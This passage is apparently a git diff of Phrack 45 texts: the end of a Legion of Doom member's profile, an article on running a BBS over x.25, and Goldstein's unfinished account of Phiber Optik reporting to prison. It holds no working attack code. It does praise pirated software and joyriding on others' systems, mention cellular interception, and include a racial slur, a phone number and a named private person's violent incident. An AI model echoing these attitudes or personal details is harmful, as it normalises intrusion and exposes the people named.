+pretty 3l33t.  If you can't hack the  New User Password--U R
+really lame!  We got 0 day AMIGA Warez.  Running on a USR HST.
+Leave a good New User Feedback message because the users on the
+system read the New User Feedback and vote whether or not you
+will be allowed access to the system based on that message.
+
+ShadowSpawn BBS - Well, this was before I was in LOD.  Our claim
+to fame was that we wouldn't let anyone on the BBS unless they
+gave us a valid phone number.  We voice verified EVERYONE.  And
+talked to them before we gave them an account.  Most of the
+people from LOD were not on because they would not give a valid
+phone number.  It was not my idea it was Psychic Warlord's idea.
+I could not believe we turned Lex Luthor down--we got in quite a
+fight about that.
+
+Phantasy Realm - My first BBS.  I always thought It was LAME,
+but people always tell me how cool it was.  I guess when you
+login 15 times a day, it seems like the posting is slow.
+
+The Coalition - I was co-sysop on this board as well.  Run by Bad
+Subscript, one of my best friends.  Another board I never thought
+was cool but everyone says it was great.  Guess maybe I called it
+too much as well.
+
+Metal Shop Private - I thought I was the Elite of the Elite when
+I got on there.  There were guys from LOD posting and everything.
+I really was a cool system.
+
+Catch 22 - Well I think I was the last user before the system
+went down.  I think I was on for about 3 days before it went off
+line.  I think it was good.  As least I used it for a reference
+on other BBS (That was when I was just becoming well known.)
+
+Whacky Wally's Wonderful World Of Warez - Some of you may
+remember it.  It was an H/P board that I ran for a while before
+Phantasy Realm.  It was mostly done for a joke, but it ended up
+being pretty cool.
+
+----------------------------------------------------------------------
+
+People to mention:
+
+Erreth Akbe -  One of my best friends.  Helped me write this
+profile.  Sysop of Planet 10/Librarians of Doom. The MASTER
+NOVELL guy.  If you want to  know anything about NOVELL...Talk to
+him.  (He's a CNE!!)  Without him you would have all sorts of
+spelling errors and this profile would really look like shit.
+Plus, the BBS would have crashed long ago.  He's my official
+editor.
+
+Carol - Erreth Akbe's Wife.  Love ya babe!  Got me a great deal
+on my 3000GT.  I still owe you dinner!
+
+Bad Subscript - My best friend.  What a great guy.  We hit
+Industry (the coolest nightclub in Pontiac) every Tuesday night.
+He's the biggest LEEEECH in the world, though.  At this point he
+has 192 Downloads @ 94 Megs and 9 Uploads @ 2 Megs.  Great ratio, eh?
+
+Lucifer 666 - What a great guy.  Still talk to him daily after
+all these years.  Comes to Detroit a lot and I go to Illinois to
+see him a lot. I have a great story about L666.  His family owns a
+real estate company in Illinois where he lives.   Well, they sold
+a house to Virgil Ramsey, a Vietnam Vet.  Well, Mr. Ramsey's new
+house has termite damage.  L666 went to the house and verified
+the damage.  He told Mr. Ramsey that he would call an
+exterminator the next day.  Well I guess Mr. Ramsey didn't like
+the exterminator idea, because the next day he went to L666's
+office with a bolt-action rifle.  Took L666 outside into the
+street, with the gun to his head, and told him he was going to
+kill him.  L666 swung around and hit the gun barrel upwards just
+as Ramsey pulled the trigger.  They fought over the gun and L666
+tossed the gun into the street.  Ramsey went after the gun and
+L666 ran into the real estate building and locked the back door.
+Ramsey ran in the front door with gun in hand.  L666 went into
+his office and locked the door.  Ramsey kicked in his office
+door.  L666 was under his desk.  Ramsey said "Stand Up (L666's
+First Name) and take it like a Man!" L666 jumped up and they
+fought over the gun again.  (I was at his office and saw the
+footprints on his door).  The bolt action opened and the bullet
+in the chamber fell to the ground.  Ramsey put the gun to L666's
+head and pulled the trigger, but the action was open.  The cops
+finally came in and arrested Ramsey.  They say it is some type of
+stress related to Vietnam.
+
+Laurie (L666's Girlfriend) - She's Cool.  Hi Hoochie!  Well I
+have a good story about her.  BTW If you talk to L666 ask him why
+I call his girlfriend "Baldie".  Anyway.  L666 and Laurie came to
+Detroit in October.  The first night we went to this bar that I
+always go to, called Industry.  Well Laurie was worried about the
+crime in Detroit.  I had just got done telling her that nothing
+ever happens Besides, we were in Pontiac!  L666, Bad Subscript,
+Erreth Akbe DarkStar, Laurie and I were all in the car.  We
+pulled into the Industry parking lot.  Some guy was laying on the
+ground and 3 guys were kicking him.  Then they picked him up.
+Through him into the back of a panel van and drove off. L666,
+DarkStar and Laurie had been in Detroit for all of an hour and
+this is the first thing we see when we go to the bar.  Needless
+to say, she was freaking out.  The rest of the weekend went
+smoothly, though--except for DarkStar and L666 flashing deuce
+gang signs at Club X in Detroit.  Not a smart move.
+
+DarkStar - Hay bud.  He's really fun.  We party together a lot
+in Detroit and Illinois, but I wouldn't take him to Las Vegas
+with me.  He did really shitty on the river boat we gambled on in
+the Mississippi river last November.
+
+Prime Suspect - Fellow LOD member.  One of the smartest hackers I
+have ever met.  In fact PR1ME Computers call him to help program
+there kernels when they can't figure it out.  No lie!  He also is
+Mr. Packet Radio.  I really had fun with the cellular phone
+interception.  I talk to him 3-4 times a week. He and Bad
+Subscript talk more, though.  Finally after 6 or 7 years he came
+to Detroit to see us last November.  We had a great time.  I'm
+sure he'll be back.
+
+Bill From RNOC - Fellow LOD Member. My Mentor.  He taught me
+about UNIX and Phone Company Computer and Networks.  Taught me
+how to engineer.  Was a great friend.  We talked 3-4 times a day
+for a yea or so.  Haven't talked to him much lately.  Hope
+everything is going well for you, Bill...
+
+Lex Luthor - Mr. LOD!  U R Out of Control!  Lex is a great guy.
+There have been rumors about him floating around for years.  Let
+me tell you.  They are all false.  He is the greatest guy.  At
+SummerCon he was pretty mellow.  He stayed at my house for a week
+or two.  He was a blast.  I have pictures of Him, Bad Subscript
+and me sitting on a dumpster outside EDS, and painted on the
+dumpster it says "Computer Papers Only".  Also have picture of
+him and I outside a funeral home with the address "2600" in BIG
+letters.  Now he has been denying this outside in his underwear
+story for years.  Here it is.  Lex stayed at my house for a few
+weeks.  I hooked him up with this girl (she was HOT.. And he was
+tearing it up with her every night).  Well we went to Motel Sex
+(Motel 6) one night and were drinking pretty heavy.  At about
+0100 in the morning he went out of his room in his underwear.
+Now the doors to the rooms are outside.  And was kicking my door
+yelling "We need more Beer!".  I think it was blown a little out
+of proportion.  I hear a story that he was running around the
+parking lot or something.  But that is the story...anyway he's a
+great guy.
+
+Phantom Phreaker - Fellow LOD Member. FUN FUN FUN.  He is one of
+the friendliest people I have ever meet.  He is a blast to party
+with.  Love the hair!  He has good things to say about everyone.
+I have never meet anyone that knows more about Switching System
+and such than him.  He is a walking phone company manual.  BTW:
+How's your balls? (Private Joke)
+
+Doom Prophet - Fellow LOD Member. Phantom Phreaker's Twin Brother.
+Haven't seen much of him the last few years.  Another walking
+manual.  Hope you're doing good.
+
+The Marauder - Fellow LOD Member.  I really got along great with
+him.. Didn't see much of him the second night.  He and Phantom
+Phreaker were hiding...but he was really a great guy!
+
+Taran King/Knight Lightning - Got me into the "Elite" Scene.  I
+really like you guys.  Always a lot of fun.  Don't see much of
+you anymore at the SummerCons.  Train King is off with this
+woman, now wife.  Congratulations.. Hope you are happy forever
+And Knight Lightning is on the run from the Hotel manager who is
+running around asking everyone  "Are you Craig Nedordorf?".
+
+Erik Bloodaxe - Fellow LOD Member.  We have been completely "Out
+of Control" together. He is a blast.  We have had our
+differences, and I don't really know why.  But I really like him.
+He is BIG fun!  I didn't see much of you at the last SummerCon.
+Hope to talk to you more in the Future!
+
+Forest Ranger - JT.  What a great and fun guy.  In the past we
+didn't hang out too much, but last year at SummerCon we really
+had a great time together. What a ladies' man!  Hope to see you
+soon.  Give me a call...maybe you can come to Detroit with L666
+and go to the Gran Prix.  I'm getting us all pit passes!
+
+The Mentor - Fellow LOD Member.  Great guy.  We got into LOD/H
+together.  Haven't heard much from him lately.  Hope all is
+well.
+
+The Prophet/The UrVile/The Leftist - Fellow LOD Members.  The
+three of us really got along great.  We were always together at
+the SummerCons.  We talked 5000000 times a day on the phone.  I
+really liked them.  They were really cool.. Then............ What
+the FUCK!  The government flew them to Detroit to testify in front
+of the grand jury against me.  No problem--you do what you gotta
+do.  But if you're in town you could at least give me a call
+after all we have been through together.  That was really weak.
+And don't return my calls 3 years later... Whatever!
+
+Dispater - All around fun guy.  Didn't go to SummerCon last year.
+I know Erreth Akbe was bummed.  He was really looking forward to
+seeing you.  I'm not going this year, but if I *WAS*, I would
+really like to see ya.
+
+High Evolutionary - We have never met,  but in the mid 80's we
+talked daily.  Haven't heard anything about him in years.  He was
+really a smart guy. Hope all is well.
+
+Psychic Warlord - Great guy.  Sysop of ShadowSpawn.  We hung
+around A LOT in the old days. I understand you are getting
+married.  Congratulations.  Hope I'm invited.
+
+Mitch Kapor (Programmer of LOTUS) - You know why Mitch.  I thank
+you much.  If you ever need anything.  You have my phone number!
+
+Jim F - He helped me out of a LOT of problems.. Thanks Jim!
+
+(Please Note: These are in no special order.  If you are on the
+top of the list or the bottom it has no relation to your
+importance on the list.)
+
+---------------------------------------------------------------------
+
+What I think of the Future of the Underground:
+
+Ahahaha.. LAME, LAME, LAME..   In the old days we were the first
+to do things.  We would get on a system and play with it for
+hours.  It was a quest for knowledge. That was what LOD/H was all
+about. Today's new "hackers" are really assholes.  They don't do
+it to learn.  They want to mess things up.  I really can't stand
+the new anarchy thing that is going around.  We have kids logging
+onto the BBS that say "I have 400+ viruses".  Well.. That's not
+cool.
+
+The purpose of hacking is to learn.  Learn the way a computer
+system runs.  Learn how the telephone switching systems work.
+Learn how a packet switching network works.  It's not to destroy
+things or make other peoples lives a mess by deleting all the
+work they did for the past week.  The reason the  Department of Justice
+has crackdowns on computer hackers is because so many of them are
+destructive.  That's just stupid criminal behavior and I hope they
+all get busted.  They shouldn't be around.  You give real
+hackers a bad name.
+
+----------------------------------------------------------------------
+
+Other Things to Mention:
+
+The "NEW Legion of Doom" -  Beyond Lame.  It is my understanding
+that some lame kid from Canada (eh!) was starting a "New LOD".
+Well those kids couldn't hack their way into, let alone out of a
+Cracker Jack box.  If they are on you BBS.. Delete them!  They
+have absolutely no affiliation with the real Legion of Doom!
+
+DrunkFux - Jessie, I have been trying to get a hold of you for a
+year now.  If you could get my number and call me.  Or call our
+board (810)683-9722 and leave me your phone number.  I would like
+to get Dena's phone number from you.
+
+----------------------------------------------------------------------
+
+In the late 80's someone call forwarded my home phone to a Voice
+Mail Box.. I heard it was SuperNigger, but he says not.. I
+thought you guys might get a kick out of the message left on it.
+
+
+     My name's Control C.. AKA Phase Jitter of LOD!
+
+     Elite as can be...  I thought that was Me!
+
+     Until they forwarded my number to a V.M.B.
+
+----------------------------------------------------------------------
+
+Well that's about it.. My final words of wisdom... Call our
+board.. It's 3l33t!
+
+
+Control C
+Legion of Doom/Hackers
+1994
diff --git a/phrack45/8.txt b/phrack45/8.txt
new file mode 100644
index 0000000..a88edbf
--- /dev/null
+++ b/phrack45/8.txt
@@ -0,0 +1,300 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 8 of 28
+
+****************************************************************************
+
+
+                        Running a Board on x.25
+                        =======================
+
+In this article, I want to inform the reader about advantages, problems,
+experiences and fun about running a BBS on x.25.  I also want to do a few
+comparisons between x.25 on one hand and the Internet and phone system
+on the other.  This article may also help you to setup a BBS on a
+UNIX, no matter if on x.25 or not.
+
+
+I.      Systems on x.25...
+==========================
+
+In my article for Phrack 42 about the German scene (read it if you haven't
+done so yet! :-)  I also mentioned the x.25 scene and a few Bulletin Board
+Systems (BBS / boards) on it.
+
+One of the most popular ones, LUTZIFER, just went down on December 20, 1993.
+Lutzifer used to be one of the most popular x.25 boards back in 1990 and
+early 1991, when US people were still able to use Tymnet ("video" and
+"parmaster") and Sprintnet without much of a hassle.  I spoke with Lutz
+(sysop of Lutzifer) at the CCC Congress in Hamburg a week later.  He told
+me that he first just wanted to change the speed for his x.25 connection
+from 9600 to 2400 to save some money (actually 50%), because he didn't get
+too many calls anyway.  But the German Telekom (who handle x.25 AND the phone
+lines) wanted him to cancel his old x.25 connection, get a new NUA, pay the
+$300 installation fee, all to get a 2400 bps connection.  This really made
+Lutz mad, and he finally decided to cancel all x.25 - so goodbye to Lutzifer!
+
+On the other side, QSD (the lamest chat system one can imagine) is still
+up and running on x.25.  Back in Summer 1993, there have been many rumors
+that QSD would go down.  It wasn't reachable from most networks in the world
+anymore, including Sprintnet, Datex-P and others.  They were probably just
+"testing" something - but QSD will never have its >80 online users again
+(sounds pretty ridiculous compared to IRC :) that it had back in the good
+old days.
+
+
+II.     Advantages of x.25
+==========================
+
+You may wonder what the advantages of running a board on x.25 are.
+Wouldn't an Internet link or a phone dialup be enough?  In fact, the Internet
+is getting more and more popular, the number of its hosts is increasing
+dramatically.  This, and the fact that ISDN is faster and available to more
+and more people at cheaper rates, makes x.25 seem unattractive.
+
+But x.25 is a very old and safe network.  It hasn't really changed in 10
+years.  There are hardly any netsplits like on the Internet, and it has
+a very low rate of data errors.  X.25 is available in almost every country
+(far over 200) in the world, even in countries that never heard of Internet
+like Mauritius or United Arab Emirates.  This means that a lot of people from
+all over the world can call you at a cheap rate (at least cheaper than
+international phone charges, for some people even free at all :).
+To the sysop it offers a couple of features that modems can't offer, and
+where the Internet isn't safe enough.  This is also a reason why most banks,
+insurances and credit agencies still rely on x.25.  I will describe those
+features in the next chapter.
+
+
+III.    Setting up your X.25 board
+==================================
+
+So let's get practical after all this boring theory!
+
+How do you start if you want to setup your own x.25 board?
+
+First of all, you need your own x.25 line.  In most countries your phone
+company would be responsible; in a few countries like the US you may even
+have a choice of different x.25 providers like "Sprintnet".  The prices for
+those lines really vary.  You may check the Sprintnet or Tymnet Toll Free
+information service, that also gives you information and prices about
+other countries.  E.g. in Germany a 2400 bps (the slowest) link would be
+US$130 a month, a 9600 bps link about $260.  The good thing though is that
+each additional virtual channel is just $3 more per month (in Germany).
+A number of 16 channels is typical and 128 channels aren't exotic.
+
+But remember, all channels have to share the maximum bandwidth of - let's
+say - 9600 bps.  So if 10 people would start to leech the latest Phrack
+at the same time, they would all just have 960 bps each or 96 cps.
+
+But downloading isn't always that easy.  In fact, many of my users have
+been reporting problems while trying to download.  While a few x.25
+networks like Datapak Norway and German Datex-P are true 8 bit networks,
+many networks and PADs just handle 7 bit connections.  It's not always
+that easy to transfer binaries at 7 bit, though it was possible for me
+to download from a Sprintnet dialup using a 'good' version of Z-Modem.
+
+X.25 is not the right choice if you want to transfer huge amounts of data
+anyway.  It is meant for people who work interactively.  It is recommended
+for people who want to do a database research, read and write email and news
+or just chat.
+
+You will also notice that, if you are a paying x.25 user (aren't you all :-)
+and get your bills, connection time is really cheap; up to 70 times cheaper
+than long distance phone charges.  What counts are the transmitted bytes,
+no matter how fast you are!  You easily pay $30 for transferring 1 MB.
+
+But what else do you need after you got your x.25 link?
+
+You need a PC (which doesn't have to be fast; I was using a 386sx for quite
+some time.  In fact, my new 486/40 board is 'too fast' for my old x.25 8 bit
+adaptor :).  It might also be interesting to run it on a Sun or HP
+workstation; but the x.25 cards for those machines are rather expensive.
+
+Then you need a good operating system.  Don't even think of running DOS.
+You want to have a multi-user multi-tasking system after all, don't you?
+So your choice is UNIX.  Systems with pretty good x.25 solutions are
+Interactive and SCO Unix.  They are both old fashioned System V / 386's,
+but are running safely, hardly ever crash and are popular in the commercial
+world.  I chose Interactive.
+
+How do you connect your PC to the x.25 line?
+
+Good guess.  Yes, you need an adaptor card.  I got an EICON/PC card.  EICON
+cards are probably the best supported and most common x.25 cards - they
+are made in Canada.  However, they aren't cheap.  Usually they are around
+$1000, if you are lucky you could get a used one for $600.  You might get
+a cheaper x.25 adaptor, but check in advance if the software you want to
+use supports that adaptor.  There is no real standard concerning x.25 cards!
+
+Anything else you need?
+
+Yes, the most important thing - the software.  UNIX doesn't come with
+x.25 drivers.  However, there is a really good x.25 solution available
+from netCS Software in Berlin, Germany.  (The company was co-founded
+by "Pengo" Hans H.  Send them mail to postmaster@netcs.com for info.)
+
+
+IV.     Features
+================
+
+This software, and x.25 in general, has a few nice features.  If you
+receive an x.25 call from somewhere, the NUA ("Network User Address")
+of the caller is being transmitted to you.  This works pretty much like
+Caller-ID, with the exception that the caller can't prevent it from being
+transmitted, and he usually can't fake the address he is calling from.
+Of course he can call through a couple of systems, and you would just
+see the NUA of the last system he calls you from.
+
+This feature can easily be used to accept or reject calls from certain
+NUAs/systems or whole countries.  Many systems like banks just allow
+certain NUAs to call them, just the ones that they know.
+
+You could also give different access to different people:  people from
+country A may login to your system, country B may just write you a mail,
+all other countries are forced into chat and the NUA of CERT is being
+rejected and received a "nice" goodbye message.
+
+Of course you will also keep a logfile (and 99% of the systems you call
+will have a logfile with YOUR call and the calls you might place using
+its pad).  This logfile usually contains the NUA that calls you (or that
+is being called), the programs that are being executed, the userid of
+the caller, duration, reason for termination and more.
+
+Another interesting feature is the 'Call User Data' (CUD).  The caller may
+transmit up to 16 bytes (default is 4 bytes) to your host before he
+establishes an x.25 connection.  In these bytes he may send you a Service
+Request.  The default CUD is 01/00/00/00 and means 'interactive login'.
+You may define any CUD you want and just accept calls that use that certain
+CUD - it would work like a system password then.  Many systems may also
+have a service request that allows the caller to execute commands on that
+host remotely, without supplying any additional password (be aware of this!)
+
+For more technical information about x.25 read one of the articles in the
+previous issues of Phrack.  I am glad that Phrack is still covering x.25
+with plenty of interesting articles after all these years!
+
+
+IV.     Chosing the BBS Software
+================================
+
+Okay.  Now we decided to choose UNIX as operating system.  Of course, you
+could give all your users shell access, create a guest account with limited
+shell access and a chat account that kicks you just into chat.  That's what
+I used to do first.  But since we want to run an open system and give
+accounts to many hackers, it might be a scary vision that all of them
+have shell access and try to hack your system.
+
+This is the point when you are looking for a BBS software for UNIX.  There
+aren't too many free BBSes for UNIX around, most of them cost some hundred
+dollars (check out the latest Boardwatch issue for more information).
+
+However, I found a pretty decent BBS software called 'Uniboard'.  It runs
+fine on most System V's including Interactive and SCO; versions for Sun OS
+and Linux are available too.  It offers you a nice colorful (you may turn
+it to black & white) menu driven interface.  You have to have C-News and
+sendmail installed and running.  Instead of sendmail I use smail, which
+is bug-free, much easier to install and offers at least the same features.
+C-News though isn't that easy to install and takes quite some time and
+document reading.  But these packages are used by Uniboard for messages (news)
+and email.  This is pretty nice, because you can just exchange mail with
+everyone on the Internet.  You can also read your favorite newsgroups
+in Uniboard like alt.sex.bondage and post to local groups.  The filebase
+is designed okay, but it doesn't feature the concept of ratios yet.
+(You just get one byte download ability for each byte you upload!).  Rick,
+the author, promised me to put it into the next version though.  The biggest
+drawback is that you will just get the binary, no sources available,
+so you can't put in all the features you would like.  For more information
+send email to the author Rick in Italy at pizzi@nervous.com.
+He will give you a free demo key that works for a few weeks, if you ask him.
+Afterwards you could get a key for $40 and more, depending how many users
+you want to have.
+
+
+V.      How to get more users
+=============================
+
+You may think:  Okay, fine.  But not everybody has x.25 access, though
+(almost) everybody has Internet access.  How could these people call me?
+Well, the solution isn't easy.  I was told though that someone installed
+an Internet site that would forward the call through an x.25 PAD to my
+system.  Of course, the system administrator of that Internet site found
+out after a while and installed the following banner (he obviously has
+a sense of humor :) - someone sent me this log:
+
+
+telnet> open pythia.csi.forth.gr 2600
+Trying 139.91.1.1 ...
+Connected to pythia.csi.forth.gr.
+Escape character is '^]'.
+Welcome to Sectec Direct. Please hold the line. :)
+Calling...connected...
+
+MUniBoard v. 1.12
+400 users Runtime System S/N 345968791
+Licensed for single machine use to Seven Down on sectec
+Unauthorized duplication allowed
+Loading..
+
+              ________________________________________________
+             /~ .~  /  _ . ~/~ _ . |~  __ ~|  _ . \~ _    _ ~/
+            // ____/_ |_\__/. | \__|. |__| | |_\__/\/ |  | \/
+           /____   ~/  _|__|| |  __|:     _|  _|__    || |
+            // .  //: |_/. \: |_/. || |\ \\: |_/. \   |: |
+           /_____ /|________\______|__| \__\_______\  |__|
+    ___________________________________________   ___________________
+    \~ _    _ ~/ _ . ~/ _ .\~ _    _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~  /
+     \/ |  | \/ |_\__/ | \__\/ |  | \/ /  \||   \| || || \__// ____/_
+        || | ||  _|__| |  __   || | \\ \  /|: \  \ :| ||  ______   ~/
+        |: | |: |_/. \ |_/. \  |: |  \  \/ || |\   .| ||_/. \/ .  //
+        |__| |________\______\ |__|   \____|__| \___|_|______\___ /
+
+
+Dear fellow hacker,
+Please use YOUR telephone to make long distance calls
+Using other's systems over the Internet is just NOT fair
+let alone that is ILLEGAL.  Anyway, your hosts computer names/IP addresses
+and location, as well as accurate logs of most of your recent/6 months
+unauthorized calls are in file and might be used against you in court.
+Legal service courtesy of FIRST/CERT
+
+sorry if we ruined your day...
+
+Connection closed by foreign host.
+
+
+V.      Modem Ports
+===================
+
+Also, every board on x.25 should have a direct modem dialup (and I guess
+every board does!  The dialup for Lutzifer wasn't public, but it had one!)
+You need to have a modem at least for uucp polling of news and mail.
+If you are running UNIX, you don't need one of those really expensive
+'intelligent' cards like DigiBoard for $1000.  But make sure you have
+a 16550 chip on your I/O controller or you won't be happy.  A pretty good
+deal are AST compatible cards with 4 ports.  You can get them for $60 if
+you are lucky.  They just use one IRQ for all 4 ports and let you select
+the IRQ and the base addresses.  This is pretty convenient, because it
+is even more likely to get an IRQ conflict under UNIX than under DOS.
+Try to get a card with 16550's on it, or one that has sockets that let
+you replace the old 16450's or whatever with 16550's, without playing
+with your soldering iron.  If you buy 16550's, try to get the original
+NS (National Semiconductor) ones: NS16550AFN; Texas Instrument's aren't
+as good.
+
+Then you should get a good serial port driver like the excellent FAS 2.10.
+It is quite flexible with default drivers for AST compatible and standard
+I/O cards, supports speeds up to 115,200 bps, and supports both incoming
+and outgoing calls on the same line very well.  It only works with System V
+though.
+
+I can't help smiling when people tell me about their ElEeT WaR3Z boards
+running on DOS and Novell with a separate PC for each node.  With the
+configuration mentioned above, you can easily have 4 or 8 high speed modems
+with a host speed of 57.600 connected to a single 386 PC and no performance
+loss.
+
+
+Email me for information or accounts, or just send me love letters :)
+sec@g386bsd.first.gmd.de.
+
+by Seven Up (damiano @ irc)
diff --git a/phrack45/9.txt b/phrack45/9.txt
new file mode 100644
index 0000000..1ad9d5d
--- /dev/null
+++ b/phrack45/9.txt
@@ -0,0 +1,393 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 9 of 28
+
+****************************************************************************
+
+
+
+ No Time For Goodbyes
+
+ Phiber Optik's Journey to Prison
+
+ by Emmanuel Goldstein
+
+ It was almost like looking forward to something. That's the feeling
+ we all had as we started out on Thursday evening, January 6th - one
+ day before Phiber Optik (hereafter called Mark) was to report to
+ federal prison in Schuylkill, Pennsylvania for his undefined part
+ in an undefined conspiracy. We were all hackers of one sort or
+ another and this trip to a prison was actually a sort of adventure
+ for us. We knew Mark's curiosity had been piqued as well, though
+ not to the point of outweighing the dread of the unknown and the
+ emotional drain of losing a year of life with friends, family, and
+ technology.
+
+ There were five of us who would take the trip down to Philadelphia
+ in a car meant for four - myself, Mark, Walter, Roman, and Rob. The
+ plan was to meet up with 2600 people in Philadelphia on Thursday,
+ drive out to Schuylkill and drop Mark off on Friday, drive back and
+ go to the Philadelphia 2600 meeting, and return later that evening.
+ It sure sounded better than sending him away on a prison bus.
+
+ Knocking on the door of his family's house in Queens that frigid
+ night, a very weird feeling came over me. How many times had I
+ stood there before to take Mark to a conference, a hacker meeting,
+ a radio show, whatever. Today I was there to separate him from
+ everything he knew. I felt like I had somehow become part of the
+ process, that I was an agent of the government sent there to finish
+ the dirty work that they had begun. It doesn't take a whole lot to
+ join the gestapo, I realized.
+
+ I talked to Mark's father for the very first time that night. I had
+ chatted with his mother on a number of occasions but never his
+ father before then. He was putting on as brave a front as he could,
+ looking at any glimmer of optimism as the shape reality would take.
+ The prison wouldn't be that bad, he would be treated like a human
+ being, they'd try to visit on the weekends, and anything else that
+ could help make this seem like an extended vacation. As long as he
+ learns to keep his mouth shut and not annoy anyone, he'll be all
+ right. Of course, we both knew full well that Mark's forthright
+ approach *always* managed to annoy somebody, albeit usually only
+ until they got to know him a little. Imagining Mark fading into the
+ background just wasn't something we could do.
+
+ Everything in Mark's room was neatly arranged and ready to greet
+ him upon his return - his computer, manuals, a videotape of "Monty
+ Python and the Holy Grail" with extra footage that a friend had
+ sent him (I convinced him to let me borrow it), a first edition of
+ "Hackers" that Steven Levy had just given him, and tons of other
+ items that could keep anyone occupied for hours. In fact, he was
+ occupied when I got there - he and Walter were trying to solve a
+ terminal emulation problem. My gestapo duties forced me to get him
+ going. It was getting late and we had to be in Philadelphia at a
+ reasonable time, especially since it was supposed to start snowing
+ at any moment. And so, the final goodbyes were said - Mark's mother
+ was especially worried that he might forget part of his medication
+ or that they'd have difficulty getting him refills. (In fact,
+ everyone involved in his case couldn't understand why Mark's
+ serious health problems had never been mentioned during the whole
+ ordeal or considered during sentencing.) The rest of us waited in
+ the car so he could have some final moments of privacy - and also
+ so we wouldn't have to pretend to smile while watching a family
+ being pulled apart in front of us, all in the name of sending a
+ message to other hackers.
+
+ Our drive was like almost any other. We talked about the previous
+ night's radio show, argued about software, discussed nuances of
+ Star Trek, and managed to get lost before we even left New York.
+ (Somehow we couldn't figure out how the BQE southbound connected
+ with the Verrazano Bridge which led to an extended stay in
+ Brooklyn.) We talked about ECHO, the system that Mark has been
+ working on over the past year and how, since Wednesday, a couple of
+ dozen users had changed their last names to Optik as a tribute. It
+ meant a lot to him.
+
+ When you're in a car with five hackers, there's rarely any quiet
+ moments and the time goes by pretty quickly. So we arrived in
+ Philadelphia and (after getting lost again) found our way to South
+ Street and Jim's Cheesesteaks, a place I had always wanted to take
+ Mark to, since he has such an affinity to red meat. Jim's is one of
+ my favorite places in the world and we soon became very comfortable
+ there. We met up with Bernie S. and some of the other Philadelphia
+ hackers and had a great time playing with laptops and scanners
+ while eating cheesesteaks. The people at Jim's were fascinated by
+ us and asked all kinds of questions about computers and things.
+ We've had so many gatherings like this in the past, but it was
+ pretty cool to just pull into a strange city and have it happen
+ again. The karma was good.
+
+ We wound up back at Bernie S.'s house where we exchanged theories
+ and experiences of our various cable and phone companies, played
+ around with scanners, and just tried to act like everything was as
+ normal as ever. We also went to an all-night supermarket to find
+ Pennsylvania things: TastyKakes, Pennsylvania Dutch pretzels, and
+ pickles that we found out were really from Brooklyn. We managed to
+ confuse the hell out of the bar code reader by passing a copy of
+ 2600 over it - the system hung for at least a minute!
+
+ It was around five in the morning when one of us finally asked the
+ question: "Just when exactly does Mark have to be at this prison?"
+ We decided to call them right then and there to find out. The
+ person answering the phone was nice enough - she said he had until
+ 11:59 pm before he was considered a fugitive. This was very good
+ news - it meant a few more hours of freedom and Mark was happy that
+ he'd get to go to the Philadelphia meeting after all. As we drifted
+ off to sleep with the sun rising, we tried to outdo each other with
+ trivial information about foreign countries. Mark was particularly
+ good with obscure African nations of years past while I was the
+ only one who knew what had become of Burma. All told, not a bad
+ last day.
+
+ Prison Day arrived and we all got up at the same moment (2:03 pm)
+ because Bernie S. sounded an airhorn in the living room. Crude, but
+ effective.
+
+ As we recharged ourselves, it quickly became apparent that this was
+ a very bizarre day. During the overnight, the entire region had
+ been paralyzed by a freak ice storm - something I hadn't seen in 16
+ years and most of the rest of us had never experienced. We turned
+ on the TV - interstates were closed, power was failing, cars were
+ moving sideways, people were falling down.... This was definitely
+ cool. But what about Mark? How could we get him to prison with
+ roads closed and treacherous conditions everywhere? His prison was
+ about two hours away in the direction of wilderness and mining
+ towns. If the city was paralyzed, the sticks must be amputated
+ entirely!
+
+ So we called the prison again. Bernie S. did the talking, as he had
+ done the night before. This time, he wound up getting transferred
+ a couple of times. They weren't able to find Mark's name anywhere.
+ But that good fortune didn't last - "Oh yeah, I know who you're
+ talking about," the person on the phone said. Bernie explained the
+ situation to them and said that the State Troopers were telling
+ people not to travel. So what were we to do? "Well," the
+ friendly-sounding voice on the other end said, "just get here when
+ you can get here." We were overjoyed. Yet more freedom for Mark all
+ because of a freak of nature! I told Bernie that he had already
+ been more successful than Mark's lawyer in keeping him out of
+ prison.
+
+ We spent the afternoon getting ready for the meeting, watching The
+ Weather Channel, and consuming tea and TastyKakes in front of a
+ roaring fire. At one point we turned to a channel that was hawking
+ computer education videos for kids. "These children," the fake
+ schoolteacher was saying with equally fake enthusiasm, "are going
+ to be at such an advantage because they're taking an early interest
+ in computers." "Yeah," we heard Mark say with feigned glee from
+ another room, "they may get to experience *prison* for a year!"
+
+ It took about 45 minutes to get all of the ice off our cars.
+ Negotiating hills and corners became a matter of great concern. But
+ we made it to the meeting, which took place in the middle of 30th
+ Street Station, where all of the Amtrak trains were two and a half
+ hours late. Because of the weather, attendance was less than usual
+ but the people that showed up were enthusiastic and glad to meet
+ Phiber Optik as he passed by on his way up the river.
+
+ After the meeting we found a huge tunnel system to explore,
+ complete with steampipes and "Poseidon Adventure" rooms. Everywhere
+ we went, there were corridors leading to new mysteries and strange
+ sights. It was amazing to think that the moment when everybody
+ figured Mark would be in prison, here he was with us wandering
+ around in the bowels of a strange city. The karma was great.
+
+ But then the real fun began. We decided to head back to South
+ Street to find slow food - in fact, what would probably be Mark's
+ last genuine meal. But Philadelphia was not like New York. When the
+ city is paralyzed, it really is paralyzed. Stores close and people
+ stay home, even on a Friday night. We wanted to take him to a Thai
+ place but both of the ones we knew of were closed. We embarked on
+ a lengthy search by foot for an open food place. The sidewalks and
+ the streets were completely encased in ice. Like drunken sailors in
+ slow motion, we all staggered down the narrow streets, no longer so
+ much concerned with food, but just content to remain upright.
+ People, even dogs, were slipping and falling all around us. We did
+ our best to maintain dignity but hysterical laughter soon took over
+ because the situation was too absurd to believe. Here we were in a
+ strange city, unable to stand upright in a veritable ice palace,
+ trying to figure out a way to get one of our own into a prison. I
+ knew it was going to be a strange trip but this could easily beat
+ any drug.
+
+ We ate like kings in a Greek place somewhere for a couple of hours,
+ then walked and crawled back to the cars. The plan now was to take
+ Mark to prison on Saturday when hopefully the roads would be
+ passable. Actually, we were all hoping this would go on for a while
+ longer but we knew it had to end at some point. So, after a stop at
+ an all-night supermarket that had no power and was forced to ring
+ up everything by hand, we made it back to Bernie's for what would
+ really be Mark's last free night. It was well after midnight and
+ Mark was now officially late for prison. (Mark has a reputation for
+ being late to things but at least this time the elements could take
